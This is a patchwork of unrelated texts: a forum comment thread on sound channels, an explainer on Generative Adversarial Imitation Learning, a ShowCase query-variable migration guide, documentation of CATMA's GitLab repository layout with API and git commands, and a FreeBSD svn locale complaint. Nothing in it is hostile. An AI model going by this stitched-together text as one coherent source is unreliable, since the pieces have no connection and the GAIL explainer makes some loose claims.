"I have to maintain such an array in order to be able to stop all sounds at once." looks to me like you want to be able to stop all sounds at once, so the soundMixer can do that for you the moment you want it to, without you having to keep all your soundchannels in an array.
Well, I have updated my comment. In other words, I'm not going to stop all sounds. I'm going to stop only "special" sounds i.e. all sounds from my array.
Thanks, Michiel. Beautiful solution!
glad i was able to help :) and you might want to accept the answer, so this question can be stored as answered.
|
STACK_EXCHANGE
|
Generative Adversarial Imitation Learning (GAIL) is a powerful deep reinforcement learning technique that has been developed in recent years. It combines Generative Adversarial Networks (GANs) and Inverse Reinforcement Learning (IRL), which are both important subfields within machine learning and artificial intelligence. GAIL has proven to be an effective method for solving complex decision-making problems in a number of domains.
GAIL is a type of deep reinforcement learning technique that is used for learning the optimal policy for an agent in a given environment. The goal of GAIL is to allow an agent to learn by observing a human expert performing the task, rather than by being trained through trial and error. In other words, GAIL combines the ability to model the environment with that of modeling human behavior, thus providing a mechanism for efficient learning.
GAIL is a two-player game where the discriminator tries to distinguish between the expert’s and the agent’s policies while the generator attempts to imitate the policy of the expert. The generator generates a policy for the agent by taking actions in the environment whereas, the discriminator continuously tries to distinguish between the two policies. The discriminator is trained to maximize the difference between the expert policy and the generated policy by assigning a high probability to the expert's policy and a low probability to the generated policy. On the other hand, the generator is trained to minimize the difference between the expert policy and the generated policy by optimizing the weights of the generator network.
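As a rough illustration, here is a toy PyTorch sketch of one discriminator update and the resulting reward signal for the generator. The batches, network sizes and hyperparameters are placeholders; a real implementation would roll out the policy in an environment and update it with a policy-gradient method such as TRPO or PPO.
import torch
import torch.nn as nn

obs_dim, act_dim = 4, 2
# Discriminator maps a (state, action) pair to a logit: "expert or agent?"
disc = nn.Sequential(nn.Linear(obs_dim + act_dim, 64), nn.Tanh(), nn.Linear(64, 1))
opt = torch.optim.Adam(disc.parameters(), lr=3e-4)
bce = nn.BCEWithLogitsLoss()

expert_sa = torch.randn(32, obs_dim + act_dim)  # stand-in for expert (s, a) pairs
agent_sa = torch.randn(32, obs_dim + act_dim)   # stand-in for agent rollouts

# Discriminator step: expert pairs labelled 1, agent pairs labelled 0.
loss = bce(disc(expert_sa), torch.ones(32, 1)) + bce(disc(agent_sa), torch.zeros(32, 1))
opt.zero_grad()
loss.backward()
opt.step()

# The generator's (policy's) reward signal for each agent pair:
with torch.no_grad():
    reward = -torch.log(1 - torch.sigmoid(disc(agent_sa)) + 1e-8)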
GAIL has a wide range of applications in various domains such as autonomous vehicles, robotics, and gaming. In the domain of autonomous vehicles, GAIL can be used to learn to achieve a desired speed while avoiding obstacles. In robotics, GAIL can be used to teach robots how to manipulate objects more efficiently. Similarly, in the gaming industry, GAIL can teach agents to play a game more efficiently by carefully observing gameplay and learning from it.
The GAIL algorithm has four main steps:
- Collect demonstration trajectories from the human expert.
- Roll out the current agent policy in the environment to generate agent trajectories.
- Update the discriminator so that it better distinguishes the expert's trajectories from the agent's.
- Update the generator (the agent's policy) so that its trajectories become harder for the discriminator to tell apart from the expert's.
These steps are repeated until the discriminator can no longer reliably separate the two policies.
GAIL has many advantages over other machine learning techniques, including:
- It learns from expert demonstrations rather than pure trial and error, which makes learning more efficient.
- It does not require a hand-crafted reward function, since the discriminator effectively supplies the learning signal.
- It is versatile, with applications across domains such as autonomous vehicles, robotics, and gaming.
- Its behavior is comparatively interpretable, because the learned policy can be judged against the expert behavior it imitates.
There are several challenges as well which need to be overcome before GAIL can be used in various applications on a large scale, chief among them acquiring enough high-quality expert demonstration data and designing a proper reward function.
In conclusion, Generative Adversarial Imitation Learning is an effective deep reinforcement learning technique that has proven to be useful in a number of domains. It leverages the ability to model the environment with that of modeling human behavior, allowing it to learn more efficiently. GAIL has many advantages over other machine learning techniques, including interpretability and versatility, but it also has some challenges, such as data acquisition and proper reward function design. Despite these challenges, GAIL has the potential to revolutionize the way we approach complex decision-making problems in a number of domains, making it an area of active research and development.
© aionlinecourse.com All rights reserved.
|
OPCFW_CODE
|
ShowCase 9x (and earlier) queries can be designed with variables that use blanks as a Null capable default value. By default all new variables added to a query are set as Null Capable. This allows the query to run without a value and, in effect, return all records for the variable.
ShowCase 10 query objects (views) do not apply this feature automatically in versions prior to R10M14 and 10.20.174. Instead the views must be designed to use the reserved keyword of *ALL (or *OMIT) along with specified leading and trailing text to achieve the same result.
Null Capable ShowCase queries will migrate using the C&DS Migration Utility, or the ViewPoint Import ShowCase Query feature. Beginning with ShowCase R10M03, the Migration Utility (and the ViewPoint Import
ShowCase Query feature) will migrate Null Capable variables in most instances, and the view/query logic will be adapted to use a *OMIT/*ALL technique.
Warning messages will be added to the migration log in the event of a translation code issue. Verification should be done along with a review of the necessity of using Null capable variables. In many cases, it is a best practice
to make a record selection mandatory so meaningful results are returned instead of all records.
Consider the following example ShowCase query:
Here is the SQL from a ShowCase query containing two variables—one for a state value (&STATE) and the other (two really) for a date range (&ENTRY_DATE).
STATE IN( &STATE )
AND ENTRY_DATE BETWEEN &ENTRY_DATE AND &ENTRY_DATE
In the example that follows, the migrated ViewPoint view will be modified so the date variables can be run to return all dates for a given state.
- Open the migrated view in the ViewPoint view designer. Notice that except for the file-library qualification, and the renaming of the second occurrence of the Entry_Date variable name, the SQL is very similar to the original ShowCase version. In fact, the view will run and prompt for input. It just won't return all records like it used to (yet).
The way ViewPoint achieves the effect of returning all values for a variable is to omit the variable and any leading or trailing SQL text associated with the variable. The variable and text are removed (omitted) from the SQL at run-time thereby returning all the records.
If you focus on the WHERE clause above we see:
WHERE 1 = 1 AND STATE IN(&STATE) AND ENTRY_DATE BETWEEN ‘&&ENTRY_DATE’ AND ‘&&ENTRY_DAT1’
At run time, if the reserved values *ALL or *OMIT are entered in place of date values, the SQL will look like so:
WHERE 1 = 1 AND STATE IN(&STATE) AND ENTRY_DATE BETWEEN ‘’ AND ‘’
Although the variables have been removed, the SQL syntax is wrong and the view will error. For each variable the leading and trailing (SQL) text must be defined so they can be removed along with the variables.
- Select the Variables tab and notice the migration process added the necessary leading and trailing text. You can click in any of the entry boxes to make changes. For the two date variables the Default Value is set to *ALL. Starting with the ENTRY_DATE variable, the Omit Leading Text is set to literally AND ENTRY_DATE BETWEEN ‘ (including the single quote) and the Omit Trailing Text is set to a single quote (’).
Note: The Omit Leading Text value is limited to 32 characters.
For the ENTRY_DAT1 variable, the Omit Leading Text is set to AND ‘ (including the single quote) and the Omit Trailing Text is set to a single quote (’).
- Select File\Display Results, or press the Display Results button on the toolbar.
- In the Prompt window, notice the date prompts default to *OMIT (this is the same as *ALL). To run as is, press the OK button, but if you want to see the effect of the *OMIT with the leading and trailing values, use the drop-down calendar to select a date for the second date like so (don’t press OK):
This is a handy feature (only available in design mode): Press the Show SQL button to open the Merged SQL Statement window (below).
Notice how the first date is missing from the WHERE clause along with its leading and trailing values, and the second date has been replaced with a value. This is a useful way to see if the SQL syntax is correct before running or saving the view.
- Press the Close button and uncheck the second date value to return it to *OMIT like so:
Press the OK button to see results.
- Once satisfied with the changes to the view select File\Save or press the Save button to save the view.
|
OPCFW_CODE
|
I am localizing my iOS app, and in the Simulator it runs correctly in my chosen language every time.
When testing on my iPhone 5, it only detects the language properly the first time the app runs. Every other time I recompile and run my app on the device, it detects "en" as the language, even though I am testing with Español ("es") selected.
I detect the language using:
[[[NSBundle mainBundle] preferredLocalizations] objectAtIndex:0]
I've also used:
[[NSLocale preferredLanguages] objectAtIndex:0]
If I kill the app after the first run, and restart it on the device, it continues to detect the language properly.
But if I kill the app and then recompile/restart via Xcode after the initial run, it will load with "en" (English) detected instead.
After that, killing and re-starting the app continuously detects as English unless I delete the app completely, and recompile/reinstall/run the app via Xcode. The cycle then repeats... subsequent rebuild/restart without first deleting the app from the device results in misdetection.
All other apps on my device display with Spanish language the entire time. The entire UI shows in Spanish.
UPDATE: I've now tested on my iPad (3rd gen) also running iOS 6, and am experiencing the same behavior.
In didFinishLaunchingWithOptions, I have this code to detect language: (language is an NSString*):
language = [[NSLocale preferredLanguages] objectAtIndex:0];
Followed by this debugging statement, to compare the value I'm getting, as well as a slightly different way of detecting it, just for debugging:
NSLog(@"Detected language: %@ / %@", language, [[[NSBundle mainBundle] preferredLocalizations] objectAtIndex:0]);
The output shows as "Detected language: es / es" when the app works properly in Spanish mode, and then shows as "Detected language: en / en" when it doesn't. Still no idea why it decides to load as English sometimes...
UPDATE 4: I appreciate everybody's answers, and I've tried the various suggestions. Unfortunately I was unable to award the +100 bounty as none of the suggestions seemed to fix the issue. If someone does ultimately find a solution that works for me, I will award another +50 bounty to them at that time.
UPDATE 5: I have updated from Xcode 4.5 to 4.5.2, and experiencing this same issue.
UPDATE 6: I have now created a new test project from scratch, and it works perfectly fine! Obviously something must be wrong in the way my project is laid out, or perhaps in one of the data files. I guess my next journey will be to re-create the project from scratch, copying file data over one by one...
UPDATE 7 (MONTHS LATER): Sadly, I am again facing this issue after temporarily resolving it (seemingly) by painstakingly recreating my project. On first load, the language is correctly rendered, but on subsequent loads, it reverts back to English.
SOLVED See my final solution below. Thanks for the help everyone. I may dole out some of the bounty since it will go to waste anyway.
|
OPCFW_CODE
|
import structlog
class Trade(object):
    def __init__(self, pair, current_price, amt_btc, uuid=None, stop_loss=None, client=None):
        self.output = structlog.get_logger()
        self.status = "OPEN"
        self.pair = pair
        self.entry_price = current_price
        self.exit_price = None
        # Position size in the base currency, bought with amt_btc at the entry price.
        self.amount = amt_btc / current_price
        self.client = client
        self.uuid = uuid
        # Store the stop loss as an absolute price, e.g. stop_loss=0.05 -> 5% below entry.
        if stop_loss:
            self.stop_loss = current_price * (1 - stop_loss)
        else:
            self.stop_loss = None
        self.output.debug("Opened " + pair + " trade at " + str(self.entry_price) + ". Spent: " + str(amt_btc) + ", Amount: " + str(self.amount) + " " + pair.split('/')[0])

    def close(self, current_price):
        # Mark the trade closed and compute the profit in BTC terms.
        self.status = "CLOSED"
        self.exit_price = current_price
        btc_started = self.amount * self.entry_price
        btc_ended = self.amount * self.exit_price
        profit = btc_ended - btc_started
        # Green for a winning trade, red for a losing one (ANSI colour codes).
        message_type = "\033[92m" if profit > 0 else "\033[91m"
        self.output.debug(message_type + "Sold " + self.pair.split('/')[0] + " at " + str(self.exit_price) + ". Profit: " + str(profit) + ", Total BTC: " + str(btc_ended) + "\033[0m")
        return profit, btc_ended

    def tick(self, current_price):
        # Close the trade automatically once the price falls below the stop loss.
        if self.stop_loss and current_price < self.stop_loss:
            return self.close(current_price)
        return None

    def show_trade(self):
        trade_status = "Entry Price: " + str(self.entry_price) + " Status: " + str(self.status) + " Exit Price: " + str(self.exit_price)
        if self.status == "CLOSED":
            trade_status = trade_status + " Profit: "
            if self.exit_price > self.entry_price:
                trade_status = trade_status + "\033[92m"   # green
            else:
                trade_status = trade_status + "\033[91m"   # red
            trade_status = trade_status + str(self.exit_price - self.entry_price) + "\033[0m"
        self.output.debug(trade_status)
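
# Hypothetical usage sketch of the Trade class above (pair, prices and amounts
# are made up; structlog logging must be configured by the caller):
if __name__ == "__main__":
    trade = Trade("ETH/BTC", current_price=0.05, amt_btc=0.1, stop_loss=0.02)
    trade.tick(0.0495)            # above the stop loss of 0.049: returns None
    result = trade.tick(0.0480)   # below the stop loss: closes the trade
    if result:
        profit, btc_total = result
    trade.show_trade()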
|
STACK_EDU
|
caf4926 wrote:You gave us some info earlier on your machine...
Can you tell us, is it a Box or Laptop?
You mention the graphics being Intel... Is that it... It's not Hybrid Intel + nvidia or other?
You are pushing this to a HDTV not a typical monitor? Not that this should be an issue, I booted Mint yesterday on my Sons Box that has a 32" HDTV and nvidia card without a hitch.
But I wonder if you could use a Monitor? Just to see.
Consider trying another mainstream distro, like: Fedora, openSUSE, just see if the behaviour is consistent.
Sorry. I meant to get back to this sooner.
It's a tower. I'm using the core i5 2500K's integrated graphics. I don't have another monitor for testing. Downloading Fedora right now. Will let you know how that works.
I did create a bootable USB stick of Mint 13 Mate using the dd command in Mountain Lion: same issue, so that would rule out the optical drive being the issue: http://community.linuxmint.com/tutorial/view/744
I also found some boot parameters that people have claimed address similar issues: http://ubuntu-tutorials.com/2010/05/06/ ... orkaround/ and viewtopic.php?f=59&t=113043
replace quiet splash with i915.modeset=0 (pulsing black screen)
replace quiet splash with i915.modeset=1 (bunch of errors culminating in an ATA bus error)
i915.915_enabled_rc6=0 quiet splash (black screen with white rectangle)
i915.915_enabled_fbc=0 quiet splash (black screen with white rectangle)
i915.semaphores=1 quiet splash (black screen with white rectangle)
I should say, I'm not sure if I entered the above parameters correctly or if there are any other parameters that might help?
Fedora worked. I didn't install it.... yet. I kind of still have my heart set on Mint. But the Fedora live CD definitely loaded without issue.
The distros that I have not been able to load include Mint 13 Cinnamon 64, Mint 13 Mate 64, Mint 14 Mate 64, Ubuntu 12.10, Mint Debian 201204
Perhaps this is what's going on? Intel Sandy Bridge compatibility issue with Ubuntu derivatives? That wouldn't explain the Debian distro not working though: http://www.phoronix.com/scan.php?page=a ... orks&num=1
I have similar problem with intel DH61 with Intel HD in LM13 all DE ( Black screen white Rectangle ), but the problem is fixed in LM 14 ( i tried Mate version )
Maybe you can try check this post : viewtopic.php?f=59&t=113043
I know your mobo is same brand with different chipset but at least you can try it
Thanks for the suggestion. As reported above, I tried with the semaphores and rc6 parameters and no luck.
|
OPCFW_CODE
|
Responsibility when making claims about the license of a work
Imagine that some person X is running a website where they provide access to some creative work and claim that it is in the public domain, or under a permissive copyright license.
Imagine that Y retrieves the work and makes use of it in a way which is permitted by the license and would not be permitted otherwise. For instance, Y redistributes the work, sells it, translates it, etc.
Now, imagine that the work is actually not at all under this permissive license, and X's claim to that effect was wrong. Now, the actual copyright owner on the work, Z, notices Y's illegal use of their work, and sues them for copyright violation.
Can Y defend themselves by pointing out that they thought their use was permitted because of X's claim? Or are they fully responsible for their use of the work?
Could Y attack X for their false claim about the license of the work? If yes, to what extent would X be responsible?
Would it make a difference whether X was acting in good faith or not? E.g., maybe X really thought the work was under that license and were wrong, for instance because they had copied it from some other source with a wrong license claim. Or maybe X had not really made any effort to check the origin of the work, and they should have known that the license was not as indicated.
In the shoes of X, is there a way to distribute some creative work under a free license without promising that you have checked its copyright status carefully? E.g., say that you are allowing its use under a free license as far as you are concerned, but you don't promise that other parties like Z may not have a claim to it?
This last question is motivated by situations where a creator X takes a copyrighted work by Z, makes some derivative of it with an unclear copyright status (e.g., a mashup, parody, etc.), and wants to distribute it and say "I'd like to put it under a free license but I don't promise that Z doesn't have a valid copyright claim against reuse of the work." This is important because in many cases Z will leave X alone (e.g., because they are distributing the derivative work noncommercially) but could pursue some third-party Y if they started selling the derivative work by X.
Can Y defend themselves by pointing out that they thought their use was permitted because of X's claim?
No
Or are they fully responsible for their use of the work?
Yes
Could Y attack X for their false claim about the license of the work?
Yes, the torts of deceit and negligence spring to mind as do statutory prohibitions on deceptive and misleading conduct.
If yes, to what extent would X be responsible?
If they were guilty of deceit they would be liable for all of Y's losses. If they were negligent they would be responsible for all of Y's foreseeable losses.
Would it make a difference whether X was acting in good faith or not?
No
In the shoes of X, is there a way to distribute some creative work under a free license without promising that you have checked its copyright status carefully?
No. If X cannot verify that they have the right to offer a licence then they should not offer a licence.
Thanks! Does X have a way to avoid being guilty of deceit or negligence, etc., i.e., waiving all liability about their claim about the license of the work? Essentially I'm looking for a way for X to say "I'm not making any copyright claims about the work myself and as far as I'm concerned you can use it under the terms of this license, but I'm not making any promises about copyright interests that may be held by someone else."
@a3nm If you aren't willing to make any claim about the license of someone else's work, you almost certainly should not be redistributing it.
@Brandin: The idea is when you are distributing work which is based on someone else's, and you're not sure about the status of the original work or whether the right holders still have rights. Say I do a cover of a copyrighted song, or some art based on images found on the Internet with unclear copyright status, etc. I'd like to be able to say "my work is under license X as far as I'm concerned, but I don't know the legal situation about the original works I used". (Of course, if redistributing someone else's work verbatim, I agree with you.)
@a3nm if you don't know the copyright status then you cannot republish because you don't know if you are breaching copyright.
|
STACK_EXCHANGE
|
If the statically compiled code wants to access a variable in the kernel module code, must the module be compiled statically?
So I believe the kernel module code can use whatever is in the statically compiled kernel code, as long as the symbols are exported. But if the statically compiled kernel code wants to use a global variable in the module code, is that possible?
For example, we have a global variable called "int a" in some kernel module code (whatever loadable kernel module). In the statically compiled kernel code (e.g., in /linux/sched/fair.c), I want to access that variable.
This will cause a compile error, since the modules are compiled last (after the statically compiled kernel code is compiled) and are not loaded at the beginning.
What if I first declare this variable in a statically compiled header file? But before the module is loaded, that variable will be meaningless.
Thanks,
Please add some code or make the question clearer.
Different solutions could be possible depending on what exactly you need. I assume you control at least the statically linked code and can change it if needed.
Way 1
If the statically linked code could export a function (something like set_my_good_var_ptr()), the dynamically loaded module could call that function to pass the address of the needed variable to the former.
Or, perhaps, the statically linked code could provide an interface that the dynamically loaded module could use to provide the get/set callbacks thus allowing to access the variable.
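A rough C sketch of the first variant of Way 1 (all names here are made up for illustration; the prototype would live in a shared header, and the static code must handle the pointer being NULL):

/* In the statically linked kernel code: */
#include <linux/export.h>

static int *my_good_var_ptr;   /* NULL until the module registers it */

void set_my_good_var_ptr(int *p)
{
    my_good_var_ptr = p;
}
EXPORT_SYMBOL(set_my_good_var_ptr);

/* In the loadable module: */
#include <linux/module.h>

static int a;

static int __init my_module_init(void)
{
    set_my_good_var_ptr(&a);
    return 0;
}

static void __exit my_module_exit(void)
{
    set_my_good_var_ptr(NULL);  /* unregister before the variable disappears */
}

module_init(my_module_init);
module_exit(my_module_exit);
MODULE_LICENSE("GPL");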
If all this is not suitable for your project (e.g. if you cannot change the code of the dynamically loaded module), the following might help, although I would not call it a good practice.
Way 2
Watch for the kernel module providing that variable to load (see register_module_notifier() function, for example).
Note that the notification function will be called after the module has loaded but before its initialization function is called.
When the notification function is called, you could use kallsyms_lookup_name() or kallsyms_on_each_symbol() to get the address of the variable you need.
This requires CONFIG_KALLSYMS and CONFIG_KALLSYMS_ALL to be set in the kernel configuration. If one or both these options are not set, it is still doable but somewhat more difficult (e.g. find the symbol in the binary file of the module, get the address of the ELF section the symbol belongs to and the offset in it and pass all this to your code, etc.)
After you have found the address of the variable, the statically linked code will have to determine somehow when the variable can actually be used (when it is initialized, etc.). How to do that depends on what the modules involved actually do, I can give no advice for that.
I think the kernel and any module are able to use find_symbol (defined in kernel/module.c) to discover the address of any other symbol in the kernel or any loaded module, statically compiled or not.
|
STACK_EXCHANGE
|
CATMA works locally on the Git projects. When you synchronize your CATMA Project you actually synchronize the local Git projects with their remote counterparts in the GitLab backend. That means before you access your data via GitLab/Git you should always synchronize your CATMA Project within CATMA.
A CATMA Project is equivalent to a GitLab Group.
The CATMA ProjectID is equivalent to the GitLab Group name. The name and the description of your CATMA Project are stored in the GitLab Group description.
CATMA uses the user, role and permission management of GitLab. So if you are working with a team on your CATMA Project you will find all participating team members in the Members section of the corresponding GitLab Group.
If you have a CATMA account you can use the same credentials to log in to the GitLab backend (your username and password or your Google account).
A CATMA Project usually contains several resources. A resource can either be a Document, an Annotation Collection or a Tagset. All resources are modelled as GitLab/Git projects. A CATMA resource is a GitLab/Git project within the GitLab Group namespace. In order to avoid confusing a CATMA Project with a GitLab/Git resource project we will use those names throughout this article explicitly.
The Root GitLab/Git Project
You will find all your CATMA resources as GitLab/Git projects within your GitLab Group. There is one additional GitLab/Git project in the GitLab Group which is special: the root GitLab/Git project. Its name is a concatenation of the CATMA ProjectID and _root. Let’s assume you have a CATMA Project named Shakespeare with the ID CATMA_900F812B-69EF-4326-A3E6-58BCFF509719_Shakespeare. Then the root GitLab/Git Project would be named: CATMA_900F812B-69EF-4326-A3E6-58BCFF509719_Shakespeare_root
So what is this root GitLab/Git project all about? Changes to your resources, e.g. adding Annotations to a Collection, are all versioned within the GitLab/Git project that backs a CATMA resource. But what about changes to the structure of your CATMA Project that are made when you add or remove resources? Changes to this structure, the CATMA Project configuration so to speak, are recorded and versioned in the root GitLab/Git project. Luckily Git offers a standard way to manage such a configuration: git submodules. So all resources that are part of the current version of your CATMA Project are Git submodules of the root GitLab/Git project. We will come back to that later when I talk about how to actually work with your CATMA Project via Git. Note for now that CATMA versions your CATMA Project configuration with Git submodules.
When you add a resource to your CATMA Project it gets added as a GitLab/Git project to the GitLab Group and it gets added as a Git submodule to the root GitLab/Git project.
When you remove a resource from your CATMA Project it gets removed as a submodule from the root GitLab/Git project. It does not get removed as a GitLab/Git project from the GitLab Group automatically. So if you get back to older versions of your CATMA Project configurations the resources are still available.
The folder structure of the root GitLab/Git project is as follows:
Besides the .git folder with the Git management and configuration files there is also a .gitmodules file which maintains the list of Git submodules and a subfolder for each of the resource categories of a CATMA Project.
The Documents are all within the documents folder of your root GitLab/Git project.
Each Document has its own folder named after the CATMA ID of the Document.
Each Document folder contains four files:
- header.json – contains metadata of Document
- CATMA_ID_orig.EXT – the original file that was uploaded with a format specific extension
- CATMA_ID.txt – the extracted text in UTF-8 plain/text
- CATMA_ID.json – the indexed types with the start, end and token offset of their tokens, i. e. the word list
The Extracted Text
The file with the extracted text in UTF-8 plain/text is the most important file as all start and end offsets of the Annotations can be resolved against the character offsets of the extracted text.
The Tagsets are all within the tagsets folder of your root GitLab/Git project.
Each Tagset has its own folder named after the CATMA ID of the Tagset.
Each Tagset folder contains a header.json file with some metadata like the Tagset’s name.
Remember a Tagset contains zero or more Tags that can form a hierarchical structure:
- A Tag has either no parent (top level Tag) or exactly one parent.
- A Tag can have zero or more child Tags.
Each Tag has its own folder named after the Tag’s CATMA ID.
Tag folders of Tags that have a parent Tag are located as subfolders of a folder named after the parent Tag’s ID.
This sounds more complicated than it is, because in the end each Tag is represented by a file named propertydefs.json. To load the Tags of a Tagset you just need to parse all propertydefs.json files that can be found in the sub directories of the Tagset’s folder.
The propertydefs.json file contains:
- the name
- the ID, which is a UUID
- the parent ID, which is a UUID but can be empty in case of a top level Tag
- two system Properties:
- the author (catma_markupauthor)
- the color (catma_displaycolor)
The values of the system Properties are to be found in the property named
The color is encoded as an integer value containing red, green and blue values encoded as bits: red component in bits 16-23, the green component in bits 8-15, and the blue component in bits 0-7. This corresponds to the color encoding in HTML.
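For example, decoding that integer into its components (a quick Python sketch):
color = 16711680              # example catma_displaycolor value (pure red)
red = (color >> 16) & 0xFF    # 255
green = (color >> 8) & 0xFF   # 0
blue = color & 0xFF           # 0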
Besides the system Properties a Tag can have zero or more user defined Properties. Each Property has a name and a list of possible or proposal values (possibleValueList) that get presented to the user upon application of a Tag.
The Collections are all within the collections folder of your root GitLab/Git project.
Each Collection has its own folder named after the CATMA ID of the Collection.
Each Collection folder contains a header.json file with some metadata like the Collection’s name and the ID of the Document it belongs to (sourceDocumentId).
The Annotations are located in a subfolder called annotations. Each Annotation has its own file named after the CATMA ID of the Annotation.
Annotations follow the Web Annotation Data Model and are serialized as JSON-LD.
Each Annotation has a type, i. e. its Tag, and one or more references to possibly non-adjacent (discontinuous markup) text segments. Each Annotation has a timestamp and an author (not to be confused with the author of the Tag). The Annotation inherits the color, the name and the user defined Properties from its Tag. A user defined Property of an Annotation can have zero or more values which are either drawn from the set of possible values of the Tag or defined by the user while annotating (ad-hoc values).
Within the Annotation’s file you’ll find a body section with the following subsections:
- tagset – the URL of the Tagset GitLab/Git project. This URL also contains the ID of the Tagset.
- tag – the URL of the Tag GitLab/Git project. This URL also contains the ID of the Tag.
- properties – The Properties and their Annotation specific values:
- system – timestamp and author of the Annotation
- user – user defined Properties with the CATMA ID and a list of values for each Property
- target – contains a list of TextPositionSelector selectors with start and end offsets that reference the aforementioned UTF-8 plain/text file with the extracted text
Working with Git
The GitLab backend is accessible at git.catma.de. Once you’ve logged in with your CATMA account credentials (or your Google account) you can access your settings in the upper right corner. On the settings page you will find in the menu on the left the Access Tokens menu item.
Add a Personal Access Token with the ‘api’ scope enabled.
Make sure you copy the token right after creation and put it somewhere safe. You won’t be able to see the token itself after you leave the page!
Before you start please make sure that your local installation of Git has the right setting for the handling of line endings. The value of core.autocrlf needs to be set to false. You can check the value with:
git config --global --get core.autocrlf
If it doesn’t print anything out then it defaults to false. You can set the value with:
git config --global core.autocrlf false
Note that it is also possible to set this value per Git repository or on the system level. Just make sure that it is set to false for all CATMA Git repositories/projects!
Now you can work with the GitLab API.
For example to get a list of all of your CATMA Projects:
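curl -H "PRIVATE-TOKEN: <your access token>" https://git.catma.de/api/v4/groups

(This call and the next one are sketches based on the standard GitLab v4 API; judging by the GROUPID_OR_NAME parameter, a CATMA Project corresponds to a GitLab group, but the exact endpoints offered by git.catma.de may differ.)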
or, with the parameter GROUPID_OR_NAME set to the CATMA Project ID, to get a list of all the resource GitLab/Git projects and the root GitLab/Git project:
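curl -H "PRIVATE-TOKEN: <your access token>" https://git.catma.de/api/v4/groups/GROUPID_OR_NAME/projects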
Taking the Git URL of the corresponding root GitLab/Git project you can also work with Git directly to clone a CATMA Project. Assuming the abovementioned Shakespeare CATMA Project the command would look like this:
git clone --recurse-submodules <URL of the root GitLab/Git project>
Use the created access token as username and password. Alternatively you can also add an SSH key to your account and clone with SSH.
All you need is the URL of the root GitLab/Git repository. The resources of the current version get initialized automatically by the --recurse-submodules option.
You can use the cloned repository for backup purposes or to integrate external systems. However, be aware that CATMA can handle only a certain amount of complexity when resolving merge conflicts. You should therefore always resolve conflicts on your side.
CATMA always works on a local-only dev branch. Changes get merged into the local master branch. When synchronizing a CATMA Project, the local master branches of the resource Git projects and of the root Git project get merged with their remote GitLab counterparts.
Note that you should take care to stick to the abovementioned folder and file structures and formats to avoid errors.
|
OPCFW_CODE
|
using System.Threading.Tasks;
using Microsoft.EntityFrameworkCore;
using TimeTrack.Core;
using TimeTrack.Core.Model;
namespace TimeTrack.UseCase
{
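// Use case service for members: querying, creating, updating, deleting and password handling.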
public class MemberUseCase
{
private TimeTrackDbContext _context;
public MemberUseCase(TimeTrackDbContext context)
{
_context = context;
}
public async Task<UseCaseResult<MemberEntity>> GetAllAsync()
{
var r = await _context.Members.ToListAsync();
return UseCaseResult<MemberEntity>.Success(r);
}
public async Task<UseCaseResult<MemberEntity>> GetSingleAsync(int id)
{
var r = await _context.Members.SingleOrDefaultAsync(x => x.Id == id);
if (r == null)
{
return UseCaseResult<MemberEntity>.Failure(UseCaseResultType.NotFound, new { Id = id });
}
return UseCaseResult<MemberEntity>.Success(r);
}
public async Task<UseCaseResult<MemberEntity>> SetPassword(int id, string password)
{
var member = await _context.Members.SingleOrDefaultAsync(x => x.Id == id);
if (member == null)
{
return UseCaseResult<MemberEntity>.Failure(UseCaseResultType.NotFound, new
{
Message="Das Mitglied existiert nicht."
});
}
member.SetPassword(password);
await _context.SaveChangesAsync();
return UseCaseResult<MemberEntity>.Success(member);
}
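// Note: despite the "Put" in the name, this method validates the e-mail and adds a new member.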
public async Task<UseCaseResult<MemberEntity>> PutSingleAsync(MemberEntity member)
{
if (member == null)
{
return UseCaseResult<MemberEntity>.Failure(UseCaseResultType.BadRequest, new
{
Message="Das Mitglied ist fehlerhaft!"
});
}
if (string.IsNullOrWhiteSpace(member.Mail))
{
return UseCaseResult<MemberEntity>.Failure(UseCaseResultType.BadRequest, new
{
Message="Die E-Mail fehlt!"
});
}
if (member.Mail.Length > 320)
{
return UseCaseResult<MemberEntity>.Failure(UseCaseResultType.BadRequest, new
{
Message="Die E-Mail ist zu lang!"
});
}
if (await _context.Members.AnyAsync(x => x.Mail == member.Mail))
{
return UseCaseResult<MemberEntity>.Failure(UseCaseResultType.BadRequest, new
{
Message="Die E-Mail wird schon verwendet!"
});
}
await _context.Members.AddAsync(member);
await _context.SaveChangesAsync();
return UseCaseResult<MemberEntity>.Success(member);
}
public async Task<UseCaseResult<MemberEntity>> DeleteSingleAsync(int id)
{
var r = await _context.Members.Include(x => x.Activities).SingleOrDefaultAsync(x => x.Id == id);
if (r == null)
{
return UseCaseResult<MemberEntity>.Failure(UseCaseResultType.NotFound, new { Id = id });
}
_context.Activities.RemoveRange(r.Activities);
_context.Members.Remove(r);
await _context.SaveChangesAsync();
return UseCaseResult<MemberEntity>.Success(r);
}
public async Task<UseCaseResult<MemberEntity>> UpdateSingleAsync(int id, MemberEntity member)
{
if (member == null)
{
return UseCaseResult<MemberEntity>.Failure(UseCaseResultType.BadRequest, new
{
Message="Das Mitglied ist fehlerhaft!"
});
}
var m = await _context.Members.SingleOrDefaultAsync(x => x.Id == id);
if (m == null)
{
return UseCaseResult<MemberEntity>.Failure(UseCaseResultType.NotFound, new { Id = id });
}
m.Surname = member.Surname;
m.GivenName = member.GivenName;
m.Mail = member.Mail;
m.Active = member.Active;
m.MailConfirmed = member.MailConfirmed;
m.RenewPassword = member.RenewPassword;
m.Created = member.Created;
await _context.SaveChangesAsync();
return UseCaseResult<MemberEntity>.Success(m);
}
}
}
|
STACK_EDU
|
Censorship: as per ncurses in the win$ section, there seems to be some big brother filtering, marking the "ncurses.tgz" as [deleted].
Sorry for the late reply, but let's change to another topic afterwards.
I precompiled a NO-DEBUG kernel from /usr/src; uname -a reports:
FreeBSD freeBSD-CURRENT 13.0-CURRENT FreeBSD 13.0-CURRENT #5 r368997: Tue Jan 12 13:46:33 CET 2021 lizbeth@freeBSD-CURRENT:/usr/obj/usr/src/amd64.amd64/sys/LIZBETH amd64
Whenever I do a
svn up /usr/src
I get:
svn: warning: cannot set LC_CTYPE locale
svn: warning: environment variable LANG is de_AT
svn: warning: please check that your locale name is correct
At revision 369021.
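The usual fix for these svn locale warnings is to export a locale that is actually installed before running svn, for example (assuming the German UTF-8 locale is available on the system):

export LANG=de_AT.UTF-8
export LC_CTYPE=de_AT.UTF-8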
So, if someone is interested in the daily progress here, please take the time and read further:
There is no output of changes, but I wanna know what is being worked on at the moment and on which architecture.
